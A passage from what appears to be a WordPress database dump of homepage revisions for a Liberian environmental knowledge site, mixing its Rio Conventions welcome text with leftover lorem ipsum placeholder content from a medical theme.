src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_957412.jpg\" title=\"\" alt=\"\" />											\n			<h3>Pediatric Clinic</h3><p>Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_369542.jpg\" title=\"\" alt=\"\" />											\n			<h3>Dental Clinic</h3><p>Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n			<a href=\"#\" role=\"button\">\n						Register Now\n					</a>\n							saved hearts\n				+\n							happy patients\n				+\n							doctors number\n							saved lungs\n			<h2>What Our Patients Say</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n							Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_428339.jpg\" title=\"\" alt=\"\" />						\n													Mike Wright\n																			Patient #1\n							Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_324658.jpg\" title=\"\" alt=\"\" />						\n													Nancy Green\n																			Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_301284.jpg\" title=\"\" alt=\"\" />						\n													Frances Lopez\n																			Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_91227.jpg\" title=\"\" alt=\"\" />						\n													Nick Smith\n																			Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:25:23','2019-11-08 17:25:23','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(399,1,'2019-11-08 17:27:11','2019-11-08 17:27:11','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n				<h3>\n					Cardiac Rehab\n				</h3>\n								<p>Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Gynecology\n				</h3>\n								<p>Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Symptom Check\n				</h3>\n								<p>Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Rehabilitation\n				</h3>\n								<p>Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					General Surgery\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					Pediatric Clinic\n				</h3>\n								<p>Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital</p>\n				<h3>\n					Emergency Departments\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					24/7 Services\n				</h3>\n								<p>Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.</p>\n			<h2>Reserve now in our hospital</h2>		\n		Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed		\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_563214.jpg\" title=\"\" alt=\"\" />											\n			<h3>Transplant Services</h3><p>Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_957412.jpg\" title=\"\" alt=\"\" />											\n			<h3>Pediatric Clinic</h3><p>Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_369542.jpg\" title=\"\" alt=\"\" />											\n			<h3>Dental Clinic</h3><p>Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n			<a href=\"#\" role=\"button\">\n						Register Now\n					</a>\n							saved hearts\n				+\n							happy patients\n				+\n							doctors number\n							saved lungs\n			<h2>What Our Patients Say</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n							Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_428339.jpg\" title=\"\" alt=\"\" />						\n													Mike Wright\n																			Patient #1\n							Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_324658.jpg\" title=\"\" alt=\"\" />						\n													Nancy Green\n																			Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_301284.jpg\" title=\"\" alt=\"\" />						\n													Frances Lopez\n																			Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_91227.jpg\" title=\"\" alt=\"\" />						\n													Nick Smith\n																			Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:27:11','2019-11-08 17:27:11','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(400,1,'2019-11-08 17:31:43','2019-11-08 17:31:43','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n				<h3>\n					Cardiac Rehab\n				</h3>\n								<p>Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Gynecology\n				</h3>\n								<p>Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Symptom Check\n				</h3>\n								<p>Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Rehabilitation\n				</h3>\n								<p>Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					General Surgery\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					Pediatric Clinic\n				</h3>\n								